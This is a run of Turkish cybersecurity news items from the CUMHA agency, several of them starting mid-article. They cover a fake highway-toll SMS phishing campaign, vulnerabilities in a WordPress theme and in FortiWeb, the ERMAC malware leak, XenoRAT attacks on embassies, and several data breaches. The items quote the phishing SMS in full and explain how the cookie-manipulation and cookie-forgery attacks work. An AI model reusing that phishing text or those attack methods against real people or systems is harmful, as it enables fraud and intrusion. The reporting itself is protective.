SMS’teki kısa bağlantıya tıklayan kullanıcı önce mobil tarayıcıda açılan sahte sayfaya yönlendiriliyor. Sayfa kullanıcıdan öncelikle cep telefonu numarasını girmesini istiyor. Telefon numarası girildikten sonra resimde görülen ödeme bölümü açılıyor; burada karttaki isim, kart numarası, son kullanma tarihi ve CVV kodu gibi bilgiler talep ediliyor. Sayfa, resmi kurum tasarımını andıran öğeler (örneğin KGM benzeri logo, “Elektronik geçiş ücretini çevrimiçi ödeyin” başlığı) kullanarak güven yaratmaya çalışıyor.

Siber güvenlik araştırmacısı ve haberci Ebubekir Bastama, yapılan incelemede sitenin yalnızca mobil cihazlarda açıldığını ve ilk aşamada telefon numarası istendiğini tespit ettiğini bildirdi. Bastama bulgularını Ulusal Siber Olaylara Müdahale Merkezi’ne (USOM) iletti.

Bu Sahte SMS Bastama tarafından eğitim verdiği bir vatandaş tarafından bildirilmesi ile tespit edilmiştir. Mesajda son ödeme tarihi 14 Ekim 2025 olarak gösteriliyor; gönderimler son günlere bırakılarak kullanıcıların acele etmesi amaçlanıyor. Benzer dolandırıcılık girişimleri yıl içinde farklı tarihlerle tekrar edilebiliyor.Site önce telefon numarası, sonra banka kartı bilgilerini talep ettiği için kullanıcı hakkında daha fazla sosyal mühendislik verisi toplanabiliyor. Kart bilgileri girildiğinde dolandırıcılar ödeme bilgilerini ele geçirip kötüye kullanabilir; ayrıca cihazlara zararlı yazılım yüklenme riski de bulunuyor.

SMS metni örneği şu şekilde bulunuyor:
"Değerli Araç Sahibi, Sistem kayıtlarına göre, HGS bakiyeniz yetersiz olduğundan aracınızın Otoyol geçiş ücreti ödenmemiştir. Cezalı duruma düşmemeniz için, lütfen 14 Ekim 2025 tarihine kadar ödemenizi tamamlayınız. Ödenmemiş Tutar: 795,00 TL Ödeme Bağlantısı: https:[//]kgminfo[.]cc/gv?qr=3urgOi"
Bağlantıya tıklayan mobil tarayıcıda ilk aşamada telefon numarası isteniyor; ardından kart bilgileri girilen sahte ödeme formu gösteriliyor. Site mobilde çalışacak şekilde tasarlandığı için masaüstünde kolayca gözden kaçabiliyor.

Resmi kurum isimleriyle gelen ancak doğrulanamayan mesajlara itibar edilmemeli. Uzmanlar şu adımları öneriyor:

• Gelen bağlantıya kesinlikle tıklanmaması ve mesajın silinmesi.

• Gönderen numaranın engellenmesi ve mobil operatöre bildirilmesi.

• Telefon numarası ve kart bilgisi girildiyse bankaya derhal başvurarak kartın bloke ettirilmesi.

Resmi kurumlar genellikle ödeme taleplerini SMS içindeki kısa bağlantılar aracılığıyla doğrudan talep etmez. Vatandaşların e-Devlet, banka mobil uygulamaları veya kurumların resmi internet siteleri üzerinden doğrulama yapması gerekiyor. Kısa URL’ler ve bilinmeyen alan adları içeren mesajlara dikkat edilmeli; SMS’teki link yerine kurumların resmi iletişim kanalları kullanılmalı. Mobil uygulama izinleri ve tarayıcı yönlendirmeleri konusunda temkinli olunmalı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İlk tespitlere göre olay, enerji depolama alanındaki lityum-iyon bataryalarda yaşanan arıza sonucu başladı. Yetkililer 384 batarya paketinin yanarak imha olduğunu, “termal kaçak” nedeniyle yangının hızla yayıldığını bildirdi.

709 kamu hizmeti etkilendi
Yangın sonrası 709 çevrimiçi kamu hizmeti geçici olarak durdu. Bunlar arasında kimlik doğrulama, dilekçe başvuruları, posta sistemleri ve idari modüller yer aldı. İlk günlerde yalnızca %10’u yeniden çalıştırılabildi. 10 Ekim 2025 itibarıyla 217 sistem (%30,6) yeniden devreye alındı.

Yedekleme eksikliği krizin boyutunu artırdı
Kayıpların büyük kısmı, G-Drive sisteminin harici yedekleme altyapısına sahip olmamasından kaynaklandı. Korea Joongang Daily’ye göre, sistem düşük öncelikli sınıflandırıldığı için harici yedekleme yatırımı yapılmamıştı. Bu nedenle verilerin kurtarılması mümkün olmadı.

Soruşturma pil kaynaklı senaryoya odaklandı
Polis ve teknik ekipler, yangının lityum-iyon bataryalardan kaynaklandığını doğrulamak için incelemelerini sürdürüyor. Batarya odalarındaki ısı sensörleri, enerji kesme sistemleri ve taşıma süreci üzerinde duruluyor.

Resmî tepkiler ve alınan önlemler
Cumhurbaşkanı Lee Jae-myung olayın ardından veri merkezini ziyaret ederek yedeklilik standartlarının güçlendirilmesi talimatını verdi. Kriz yönetim merkezi, hizmetlerin aşamalı olarak yeniden devreye alınacağını ve ikili (dual) sistem planlamasının başlatıldığını açıkladı.

Uzmanlara göre olay ders niteliğinde
Uzmanlar, “bulut sistemlerin fiziksel risklerden muaf olmadığı” vurgusunu yaptı. Çok bölgeli mimarilerin ve düzenli yedekleme testlerinin zorunlu hale getirilmesi gerektiği ifade edildi. Ayrıca, enerji depolama odalarında lityum-iyon bataryaların güvenlik protokollerinin gözden geçirilmesi istendi.

Zaman çizelgesi:

• 26 Eylül 2025: Yangın 20.15 civarında başladı, hızla yayıldı.

• 27 Eylül 2025: Yangın kontrol altına alındı.

• 1 Ekim 2025: G-Drive verilerinin kurtarılamadığı kesinleşti.

• 10 Ekim 2025: Kurtarma oranı %30,6’ya ulaştı.

Güney Kore Devlet Veri Merkezi Yangını: 858 TB kalıcı veri kaybı, 709 kamu sistemi etkilendi

Kaynak: CUMHA - CUMHUR HABER AJANSI

Uzmanlara göre, zafiyet “service_finder_switch_back()” adlı fonksiyonun hatalı çalışmasından kaynaklanıyor. Bu fonksiyon, kullanıcı geçişlerinde “original_user_id” adlı çerezi kullanıyor ancak bu çerezde kimlik doğrulama kontrolü bulunmuyor. Saldırganlar bu çerezi manipüle ederek yönetici yetkilerine sahip hesaplara erişim sağlayabiliyor.

Siber güvenlik araştırmacıları, söz konusu açığın kötü niyetli kişilere içerik değiştirme, şifre güncelleme, zararlı kod ekleme veya siteyi oltalama ve kötü amaçlı yazılım kampanyalarında kullanma imkânı tanıdığını belirtiyor.

Etki Alanı ve Riskler
Açık, “Service Finder” temasının 6.0 sürümüne kadar olan tüm versiyonlarını etkiliyor. Tema güncel değilse, sistem üzerinde hiçbir eklenti olmasa bile site savunmasız durumda olabiliyor. Etkilenen sistemlerde izinsiz girişler, yeni kullanıcı hesaplarının oluşturulması ve yönetici panosunda olağandışı aktiviteler gözlemlenebiliyor.

Güvenlik raporlarına göre, saldırı girişimlerinde 5.189.221.98, 185.109.21.157, 192.121.16.196, 194.68.32.71 ve 178.125.204.198 IP adreslerinden gelen istekler tespit edildi. Ancak bu adreslerin kayıtlarında bulunmaması sistemin güvenli olduğu anlamına gelmiyor.

Alınması Gereken Önlemler
Uzmanlar, temanın 6.0 sonrası sürümüne geçilmesini, tüm kullanıcı hesaplarının ve yetkilerinin gözden geçirilmesini, güvenlik duvarı (WAF) veya Wordfence gibi eklentilerin aktif hale getirilmesini öneriyor. Ayrıca site trafiği ve çerez davranışlarının özellikle yönetici oturumlarında izlenmesi gerektiği vurgulanıyor.

Sistemin yedekten geri yüklenmesi planlanıyorsa, kullanılan yedeklerin temiz ve güvenilir bir kaynaktan alındığından emin olunması gerekiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tehdit Kapasitesi
Yetkililer, ele geçirilen sistemin dakikada 30 milyon SMS gönderebilecek büyüklükte olduğunu açıkladı. Ağın baz istasyonlarını devre dışı bırakma, 911 acil yardım hattına DDoS saldırısı düzenleme ve şifreli iletişim sağlama gibi işlevlere sahip olduğu belirtildi. Bu kapasitenin kamu güvenliğini ve diplomatik faaliyetleri doğrudan tehlikeye atabileceği vurgulandı.

BM Genel Kurulu Çevresinde Yoğunlaşma
Operasyonda tespit edilen cihazların büyük kısmı BM Genel Kurulu’nun yapıldığı bölge çevresinde bulundu. Bu durum, ağın uluslararası diplomatik etkinliği hedef aldığı ihtimalini güçlendirdi.

Ulus-Devlet ve Suç Örgütleri Bağlantısı
ABD’li yetkililer, adli incelemenin sürdüğünü ve ilk bulguların ulus-devlet destekli tehdit aktörleri ile organize suç grupları arasında bağlantıya işaret ettiğini duyurdu. Uzmanlara göre bu tür bir ağ casusluk, kritik altyapılara saldırı planlama ve gizli iletişim için kullanılabiliyor.

Fail Belirsizliğini Koruyor
Operasyon sonrası bazı çevrelerde Rusya, Çin ve İsrail’in adı geçse de, ABD yetkilileri herhangi bir ülkeyi resmi olarak işaret etmedi. Gizli Servis sözcüsü, “Henüz belirli bir devlet ya da örgütü suçlayacak delil yok” ifadesini kullandı.

ABD’nin Çok Katmanlı Önlemleri
Operasyona Gizli Servis’in yanı sıra FBI, İç Güvenlik Bakanlığı (DHS) ve New York polisinin de katıldığı bildirildi. BM Genel Kurulu boyunca şehirde üst düzey güvenlik protokolleri uygulandı.

Adli İnceleme Devam Ediyor
Ele geçirilen cihazlar üzerinde yapılan incelemeler, sistemin hangi ülke ya da örgütlerle bağlantılı olduğunu ve planlanan olası saldırıların boyutunu ortaya koyacak. Yetkililer, “Tehdit tam olarak ortadan kalkmış değil, soruşturma sürüyor” uyarısında bulundu.

ABD Gizli Servisi BM Genel Kurulu çevresinde 100 bin SIM kartlık gizli iletişim ağını çökertti

Kaynak: CUMHA - CUMHUR HABER AJANSI

Plex’in web sitesinde yapılan açıklamada, bir üçüncü tarafın veritabanındaki sınırlı sayıda kullanıcı verisine eriştiği ifade edildi. Ele geçirilen veriler arasında kullanıcıların e-posta adresleri, kullanıcı adları, güvenli şekilde şifrelenmiş parolaları ve kimlik doğrulama verilerinin bulunduğu aktarıldı.

Kullanıcılara çağrı
Şirket, tüm kullanıcılara parolalarını derhal değiştirmeleri yönünde uyarıda bulundu. Ayrıca güvenliğin artırılması için bağlı tüm cihazlardan çıkış yapılması ve iki faktörlü kimlik doğrulamanın etkinleştirilmesi gerektiği vurgulandı.

Veri güvenliği soru işaretleri
Plex, kullanıcı parolalarının güçlü şifreleme yöntemleriyle korunduğunu, ancak ihtiyati tedbir olarak tüm hesapların güncellenmesi gerektiğini açıkladı. Olayın ardından platformun güvenlik süreçlerini gözden geçirmeye başladığı bildirildi.

Kurum, Türkiye’de kullanılan tüm e-imzaların yalnızca BTK tarafından yetkilendirilen 8 Elektronik Sertifika Hizmet Sağlayıcı (ESHS) tarafından üretildiğini ve 5070 Sayılı Elektronik İmza Kanunu kapsamında denetlendiğini bildirdi.

"Veri havuzu bulunmamaktadır"
BTK, e-imza sisteminde kişisel verilerin kurum bünyesinde tutulmadığını, nitelikli elektronik sertifikaların yalnızca kullanıcıların USB cihazlarında bulunduğunu belirtti. Açıklamada, "Türkiye’de bulunan tüm e-imzalara ait bilgiler, BTK ya da e-Devlet kapısı dahil, toplu halde herhangi bir veri havuzunda barındırılmamaktadır." denildi.

Yanıltıcı bilgiye hapis cezası uyarısı
Kurum, siber güvenlik alanında yanıltıcı bilgi yaymanın panik ve endişe oluşturabileceğini hatırlatarak, bu tür eylemlerin 7545 sayılı Siber Güvenlik Kanunu kapsamında suç teşkil ettiğini duyurdu. Kanunun 16. maddesine göre gerçeğe aykırı siber saldırı veya veri sızıntısı iddiaları yayanlara 2 ila 5 yıl hapis cezası öngörülüyor.

Yasal süreç başlatıldı
BTK, yaklaşık 2 milyon 500 bin e-imza kullanıcısını hedef alan asılsız paylaşımlar nedeniyle sorumlu kişiler hakkında suç duyurusunda bulunulduğunu açıkladı.

BTK: "E-imza veri havuzu sızıntısı iddiaları asılsız, sorumlular hakkında suç duyurusunda bulunuldu"

Kaynak: CUMHA - CUMHUR HABER AJANSI

Veri ihlali sonucunda TTB sisteminde yer alan kayıtlı dosyalara erişildiği ve bu dosyaların silindiği ifade edildi. İhlalden etkilenen gruplar arasında çalışanlar, kullanıcılar ve tabip odalarına kayıtlı üyeler yer aldı.

Hangi veriler etkilendi
Yapılan açıklamada, kimlik, iletişim, lokasyon, hukuki işlem ve işlem güvenliği verilerinin saldırıdan etkilendiği belirtildi. Üye veri tabanına erişim sağlanamadığı için kesin sayı belirlenemese de yaklaşık 107 bin kişinin bu ihlalden etkilenebileceği bildirildi.

KVKK kararı
Kişisel Verileri Koruma Kurulu (KVKK), 14 Ağustos 2025 tarihli ve 2025/1514 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Kurulun incelemelerinin sürdüğü aktarıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hizmetlerde kesinti
Colt’un açıklamasına göre kesintiler; Colt Online, Voice API platformu ve barındırma/numara taşıma hizmetlerini etkiliyor. Müşteri iletişimi çevrimiçi portallar üzerinden sağlanamıyor, yalnızca e-posta ve telefon ile destek veriliyor. Şirket, etkilenen sistemlerin destek hizmetleri olduğunu, temel müşteri ağ altyapısının zarar görmediğini belirtti.

WarLock’un iddiası
‘cnkjasdfgd’ takma adlı bir tehdit aktörü, WarLock fidye yazılım grubu adına saldırıyı üstlendi. Aktör, Colt’tan çalındığını iddia ettiği bir milyon belgeyi 200.000 dolara satışa sundu ve bazı örnek dosyaları yayımladı. İddialara göre dosyalar; finansal veriler, çalışan ve müşteri bilgileri, üst düzey yöneticilere ait veriler, dahili e-postalar ve yazılım geliştirme belgelerini içeriyor.

Olası güvenlik açığı
Siber güvenlik araştırmacısı Kevin Beaumont, saldırganların Microsoft SharePoint’te bulunan ve CVE-2025-53770 olarak izlenen kritik uzaktan kod yürütme açığını kullanmış olabileceğini belirtti. Bu açık en az 18 Temmuz’dan itibaren sıfır gün olarak istismar edilmiş ve Microsoft tarafından 21 Temmuz’da yamalanmıştı.

Beaumont’a göre saldırganlar yüzlerce gigabaytlık müşteri verisi ve iç dokümanı sistemlerden dışarı çıkardı.

Colt’un açıklaması
Şirket sözcüsü, BleepingComputer’a yaptığı açıklamada, “Siber olayla ilgili iddiaların farkındayız, incelemelerimiz sürüyor. Teknik ekibimiz, üçüncü taraf uzmanlarla birlikte etkilenen sistemleri geri yüklemeye odaklanmış durumda” ifadelerini kullandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Fortinet’in FortiWeb ürününde bulunan kritik bir güvenlik açığı, saldırganların herhangi bir kullanıcıyı, hatta yöneticileri taklit etmesine imkân tanıyor. CVE-2025-52970 olarak izlenen açık, 12 Ağustos’ta yayımlanan güncelleme ile kapatıldı.

Açığın teknik ayrıntıları
Araştırmacı Aviv Y tarafından “FortMajeure” adı verilen açık, FortiWeb’in çerez ayrıştırmasındaki “out-of-bounds read” hatasından kaynaklanıyor. Saldırgan, Era parametresine beklenmedik bir değer atayarak sunucunun tüm sıfırlardan oluşan gizli anahtarı kullanmasına neden oluyor. Bu durum, sahte kimlik doğrulama çerezlerinin kolayca oluşturulmasını sağlıyor.

Açığın başarılı şekilde istismar edilmesi için hedef kullanıcının aktif oturum açmış olması gerekiyor. Ardından saldırgan, çerezdeki küçük bir sayısal alanı brute-force yöntemiyle tahmin etmek zorunda. Ancak bu alanın değer aralığının 30’dan küçük olması, saldırıyı pratikte kolaylaştırıyor.

Etkilenen sürümler ve yamalar
Açık, FortiWeb’in 7.0 ile 7.6 arasındaki sürümlerini etkiliyor. Güvenli sürümler ise şu şekilde:

• FortiWeb 7.6.4 ve üzeri

• FortiWeb 7.4.8 ve üzeri

• FortiWeb 7.2.11 ve üzeri

• FortiWeb 7.0.11 ve üzeri

FortiWeb 8.0 sürümleri bu açıktan etkilenmiyor. Fortinet, geçici çözüm bulunmadığını ve tek etkili adımın güncelleme olduğunu duyurdu.

Araştırmacının kararı
Aviv Y, açığın temelini gösteren bir PoC paylaştı, ancak REST endpoint üzerinden yönetici taklidi dışında tüm istismar zincirini yayımlamadı. Tam kodun daha sonra açıklanacağını, böylece sistem yöneticilerine yamaları uygulama süresi tanındığını belirtti.

Araştırmacıya göre, eksik detaylar bilgili saldırganların bile tek başına tam bir istismar geliştirmesine imkân vermiyor. Ancak duyuruların ardından siber suçluların hızlıca harekete geçtiği düşünüldüğünde, FortiWeb kullanıcılarının derhal güncelleme yapması gerekiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’nin California eyaletinde merkezi bulunan Workday, üçüncü taraf müşteri ilişkileri yönetim (CRM) platformuna yönelik bir sosyal mühendislik saldırısında veri ihlali yaşandığını duyurdu. Şirket, olayda müşteri kiracı verilerine erişim sağlanmadığını ancak bazı iş iletişim bilgilerinin sızdırıldığını açıkladı.

Saldırının ayrıntıları
Workday’in 16 Ağustos’ta yaptığı duyuruya göre saldırganlar, şirket çalışanlarını hedef alan sosyal mühendislik yöntemleriyle CRM platformuna erişim sağladı. Açığa çıkan veriler arasında ad, e-posta adresi ve telefon numaraları gibi bilgilerin bulunduğu belirtildi. Şirket, bu tür bilgilerin sonraki oltalama saldırılarında kullanılabileceği uyarısında bulundu.

Olayın 6 Ağustos’ta tespit edildiği ve saldırganların kendilerini İK veya BT çalışanı gibi tanıtarak mesaj ve telefon yoluyla bilgi toplamaya çalıştığı bildirildi.

ShinyHunters bağlantısı
Olay, ShinyHunters grubuyla ilişkilendirilen küresel saldırı dalgasının bir parçası. Grup, yıl başından bu yana Salesforce tabanlı CRM sistemlerini hedef alarak kötü amaçlı OAuth uygulamaları üzerinden veritabanlarına erişiyor. Daha önce Adidas, Qantas, Allianz Life, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Google gibi büyük şirketler de benzer saldırılardan etkilendi.

Çalınan veriler, e-posta yoluyla kurbanlardan fidye talep etmek amacıyla kullanılıyor. ShinyHunters, daha önce Snowflake, AT&T ve PowerSchool saldırılarıyla da gündeme gelmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Popüler ağ yönetim platformu N-able N-central’da keşfedilen iki kritik güvenlik açığı, dünya genelinde yüzlerce sunucuyu risk altında bırakıyor. CVE-2025-8875 ve CVE-2025-8876 olarak takip edilen açıklar, kimliği doğrulanmış saldırganların komut enjeksiyonu yapmasına ve güvenli olmayan serileştirme zafiyeti üzerinden komut çalıştırmasına imkân tanıyor.

Durumun ciddiyeti
N-able, açıkların yamalandığını ve 2025.3.1 sürümüyle kapatıldığını duyurdu. Ancak Shadowserver Foundation verilerine göre hâlâ 880 sunucu güncellenmedi. Çoğu ABD, Kanada ve Hollanda’da bulunuyor. Shodan aramalarında internete açık yaklaşık 2.000 N-central örneği görüldü.

N-able, yaptığı açıklamada güvenlik ihlallerinin yalnızca sınırlı sayıda şirket içi ortamda gözlemlendiğini, kendi bulut ortamlarında ise istismar tespit edilmediğini bildirdi.

CISA’dan zorunlu talimat
ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), açıkları “bilinen istismar edilen güvenlik açıkları” listesine ekledi. Federal kurumların, özellikle İç Güvenlik Bakanlığı, Hazine Bakanlığı ve Enerji Bakanlığı’nın sistemlerini 20 Ağustos’a kadar yamalaması zorunlu hale getirildi.

CISA, özel sektör kuruluşlarına doğrudan yükümlülük getirmese de tüm ağ yöneticilerini N-able’ın yayımladığı yamaları uygulamaya, aksi halde ürünü devre dışı bırakmaya çağırdı. Açıklamada, “Bu tür açıklar kötü niyetli aktörler için sık kullanılan saldırı vektörleri olmaya devam ediyor” denildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İngiltere’de 26 yaşındaki Al-Tahery Al-Mashriky, binlerce web sitesine saldırdığı ve milyonlarca kişiye ait bilgileri çaldığı suçlamalarını kabul ederek 20 ay hapis cezası aldı.

Soruşturmanın geçmişi
Mashriky, 2022 yılında ABD kolluk kuvvetlerinden gelen bilgiler doğrultusunda İngiltere’de tutuklandı. Mart 2025’te görülen davada suçunu kabul ederek dokuz suçtan hüküm giydi. Suçlamalar arasında Facebook kullanıcılarına ait milyonlarca giriş bilgisinin çalınması, Yemen hükümeti ve İsrail merkezli bir haber sitesi gibi kurumların hacklenmesi yer aldı.

Hedef alınan kurumlar
Adli incelemeler, Yemen Dışişleri Bakanlığı ve Yemen Güvenlik Medya Bakanlığı’nın sitelerine sızıldığını ve bu sitelerde kullanıcı adı tarama araçları yerleştirildiğini ortaya koydu. Ayrıca İsrail’deki Live News sitesinin yönetici sayfalarına erişildi ve tüm içerik indirildi. ABD ve Kanada’daki dini kuruluşlar ile Kaliforniya Su Kurulu da hedefler arasında bulundu.

Çalınan veriler
Mashriky’nin elinde 4 milyondan fazla Facebook kullanıcısına ait veriler, ayrıca Netflix ve PayPal gibi hizmetlere ait çalıntı kullanıcı bilgileri bulundu. Saldırıların bazılarında web siteleri siyasi ve dini içeriklerle tahrif edildi.

Ulusal Suç Ajansı açıklaması
İngiltere Ulusal Suç Ajansı (NCA) Siber Suç Birimi Başkanı Paul Foster, Mashriky’nin saldırılarının büyük ölçüde kesinti yarattığını belirterek, “Bu saldırılar yalnızca siyasi ve ideolojik mesaj yaymak için yapıldı. Ayrıca milyonlarca kişiyi dolandırmaya imkân sağlayacak kişisel verileri de ele geçirdi” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sızıntının içeriği
Arşivde zararlının PHP tabanlı komuta-kontrol altyapısı, React ile hazırlanmış operatör paneli, Go dilinde yazılmış veri sızdırma sunucusu, Kotlin tabanlı arka kapı ve özelleştirilmiş APK üreticisi yer aldı. Analizler, ERMAC 3.0’ın önceki sürümlere kıyasla kapsamını önemli ölçüde genişlettiğini gösterdi.

Hedefler ve yetenekler
ERMAC’ın yeni sürümü, bankacılık, alışveriş ve kripto para uygulamaları dahil olmak üzere 700’den fazla mobil uygulamayı hedefliyor. Zararlı yazılım; SMS, kişi listesi ve hesap bilgilerini çalabiliyor, Gmail içeriklerine erişebiliyor, sahte bildirimler gösterebiliyor, cihaz kamerasıyla fotoğraf çekebiliyor ve uzaktan uygulama yönetimi yapabiliyor. Ayrıca, cihazdan dosya indirme, çağrı yönlendirme ve SMS gönderme gibi iletişim suiistimali özelliklerine de sahip.

Altyapı zafiyetleri
Hunt.io, sızıntı sayesinde ERMAC’ın canlı komuta-kontrol sunucularını ve operatör panellerini tespit etti. İncelemelerde sabitlenmiş JWT tokenleri, varsayılan kök kullanıcı bilgileri ve korumasız yönetim panelleri gibi ciddi güvenlik açıkları bulundu. Bu durum, altyapının dışarıdan erişime ve manipülasyona açık hale gelmesine neden oldu.

Olası etkiler
Kaynak kod sızıntısının, ERMAC’ı “hizmet olarak kötü amaçlı yazılım” (MaaS) modelinde kullanan suçluların güvenini zedelemesi bekleniyor. Güvenlik çözümlerinin ERMAC’ı daha iyi tespit etmesi mümkün olsa da, kodun diğer tehdit aktörlerinin eline geçmesi durumunda daha gelişmiş ve tespit edilmesi zor yeni varyantların ortaya çıkabileceği değerlendiriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’nin Nebraska eyaletinde yaşayan Charles O. Parks III, “CP3O” takma adıyla yürüttüğü kripto madenciliği operasyonu nedeniyle 1 yıl hapis cezasına mahkum edildi. Parks, iki büyük bulut bilişim sağlayıcısını 3,5 milyon dolar dolandırarak yaklaşık 1 milyon dolar değerinde kripto para elde etti.

Dolandırıcılık yöntemi
Savcılık belgelerine göre Parks, “CP3O LLC” ve “MultiMillionaire LLC” gibi sahte şirketler kurarak Microsoft ve Amazon merkezli bulut hizmet sağlayıcıları da kapsayan platformlardan yüksek seviyeli işlem gücü aldı. Ocak–Ağustos 2021 arasında faturaları ödemeyerek sağlayıcıların dikkatini farklı bahanelerle dağıttı. Bir şirket yetkililerine, küresel bir çevrimiçi eğitim platformu kurduğunu ve 10 bin öğrenciye hizmet vermeyi planladığını söyledi.

Kripto madenciliği ve kara para aklama
Elde ettiği işlem gücüyle Monero (XMR), Ether (ETH) ve Litecoin (LTC) üreten Parks, kripto varlıklarını çeşitli borsalar, çevrimiçi ödeme hizmetleri, New York merkezli bir NFT pazarı ve banka hesapları üzerinden akladı. Tüm varlıkları nakde çevirerek lüks bir Mercedes-Benz S AMG otomobil, mücevherler ve birinci sınıf seyahatler satın aldı.

Kamuoyuna yansımaları
Savcılık açıklamasında Parks’ın kendisini kripto alanında “inovatif bir düşünce lideri” gibi gösterdiği, ancak gerçekte “yalnızca bir dolandırıcı” olduğu ifade edildi. Parks’ın, 2022’de YouTube kanalında “MultiMillionaire Mentality” başlıklı bir video yayımlayarak sözde zenginlik ipuçlarını paylaştığı da belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Trellix tarafından yayımlanan rapora göre, devlet destekli olduğu değerlendirilen bir casusluk kampanyası Güney Kore’deki yabancı elçilikleri hedef alıyor. Kampanyada XenoRAT zararlı yazılımı, sahte diplomatik e-postalarla dağıtılıyor.

Çok aşamalı saldırılar
Saldırılar Mart ayında başladı ve halen devam ediyor. İlk olarak Orta Avrupa’daki bir elçilik hedef alınırken, Mayıs ayında Batı Avrupa elçiliklerine sahte toplantı davetleri gönderildi. Haziran ve Temmuz aylarında ise ABD–Kore askeri iş birliği temalı oltalama e-postaları öne çıktı.

E-postalar, diplomat kimliğine bürünerek sahte toplantı davetleri, resmi yazılar ve etkinlik çağrıları şeklinde hazırlandı. İçerikler çok dilli olarak Korece, İngilizce, Fransızca, Arapça, Farsça ve Rusça yazıldı ve çoğu zaman gerçek diplomatik etkinliklerle eşleştirildi.

Zararlı yazılım dağıtımı
Saldırganlar, Dropbox, Google Drive ve Daum gibi servislerde barındırılan parola korumalı ZIP dosyaları kullandı. Dosyalarda PDF gibi görünen LNK dosyaları yer aldı. Bu dosyalar çalıştırıldığında gizlenmiş PowerShell komutları devreye girerek GitHub veya Dropbox’tan XenoRAT yükünü indiriyor ve sistemde kalıcılık sağlıyor.

XenoRAT, tuş kaydı alma, ekran görüntüsü alma, kamera ve mikrofon erişimi, dosya transferi ve uzaktan komut yürütme gibi özelliklere sahip. Bellekte doğrudan yüklenmesi ve Confuser Core ile gizlenmesi sayesinde tespit edilmesi zorlaşıyor.

Kimin arkasında olduğu tartışılıyor
Saldırılarda kullanılan altyapı ve teknikler, Kuzey Kore bağlantılı Kimsuky (APT43) grubunu işaret ediyor. Ancak saldırıların zamanlaması ve tatil dönemlerindeki duraksamalar Çin takvimine uyum gösteriyor. Bu nedenle Trellix, kampanyayı APT43’e “orta düzey güvenle” atfederek Çin desteği ihtimalini de göz ardı etmiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’de faaliyet gösteren ve Allianz SE’nin iştiraki olan Allianz Life, Temmuz ayında gerçekleşen büyük çaplı bir veri ihlalini doğruladı. Şirketin 1,4 milyon müşterisinin “çoğunluğunu” etkileyen olayda, 1,1 milyon kişinin kişisel bilgileri saldırganlar tarafından ele geçirildi.

Saldırının yöntemi
Siber saldırı, 16 Temmuz’da üçüncü taraf bulut tabanlı CRM sistemi Salesforce üzerinden gerçekleştirildi. ShinyHunters grubu, çalışanları kandırarak şirketin Salesforce altyapısına kötü amaçlı bir OAuth uygulaması bağladı. Bu erişim üzerinden müşteri ve iş ortaklarına ait veritabanları indirildi.

Çalınan veriler
Sızdırılan bilgiler arasında ad-soyad, e-posta adresi, cinsiyet, doğum tarihi, telefon numarası ve fiziksel adresler yer alıyor. Bazı dosyalarda vergi kimlik numaraları ve diğer finansal bilgiler de bulundu. Veri ihlali bildirim hizmeti Have I Been Pwned, toplamda 2,8 milyon kaydın sızdırıldığını açıkladı.

ShinyHunters’ın rolü
ShinyHunters grubu, Allianz Life’ın yanı sıra Google, Adidas, Qantas, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Workday gibi birçok büyük kurumu da hedef aldı. Grup, geçmişte Snowflake, AT&T ve PowerSchool gibi saldırılarla da gündeme gelmişti.

Allianz Life’ın açıklaması
Şirket, devam eden soruşturma nedeniyle ayrıntı veremeyeceğini, ancak bazı çalışanların da veri ihlalinden etkilendiğini doğruladı. Allianz Life, etkilenen müşterilerle iletişime geçtiğini ve incelemelerin sürdüğünü bildirdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Altı ay sonra tespit edildi
BCNYS, saldırıyı yaklaşık altı ay sonra, 4 Ağustos’ta fark etti. Yapılan incelemelerde, tehdit aktörlerinin kişisel, finansal ve sağlık bilgilerini içeren dosyalara erişerek kopyaladığı ortaya çıktı.

Çalınan veriler
Etkilenen bilgiler arasında ad-soyad, Sosyal Güvenlik numarası, doğum tarihi, eyalet kimlik numarası, banka ve hesap bilgileri, kredi kartı numarası, PIN kodları, kart son kullanma tarihleri ve vergi mükellefi kimlik numaraları yer alıyor. Ayrıca tıbbi sağlayıcı adı, teşhis ve tedavi bilgileri, reçete bilgileri ve sağlık sigortası verileri de saldırıda ifşa edildi.

Alınan önlemler
BCNYS, olayın ardından dış uzmanlardan destek alarak sistemlerini güvenceye aldığını ve kapsamlı bir soruşturma başlattığını açıkladı. Şimdiye kadar finansal dolandırıcılık veya kimlik hırsızlığına dair kanıt bulunmadığı ifade edildi. Sosyal Güvenlik numarası ifşa olan kişilere ücretsiz kredi izleme hizmeti sağlanacak.

Kurum, etkilenen bireyleri hesap ekstrelerini ve ücretsiz kredi raporlarını düzenli olarak kontrol etmeleri konusunda uyardı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD’nin Indiana eyaletinde faaliyet gösteren ilaç şirketi Inotiv, 8 Ağustos 2025’te gerçekleşen bir fidye yazılım saldırısının şirketin operasyonlarını etkilediğini açıkladı. U.S. Securities and Exchange Commission (SEC) başvurusunda paylaşılan bilgilere göre saldırganlar, şirketin bazı sistemlerine yetkisiz erişim sağladı ve verileri şifreledi.

Saldırıyı Qilin üstlendi
Qilin fidye yazılım grubu, saldırıyı kendi sızıntı sitesinde duyurarak yaklaşık 176 GB büyüklüğünde 162.000 dosyayı ele geçirdiğini öne sürdü. Grup, çaldığı verilerden bazı örnekleri de yayımladı.

Alınan önlemler
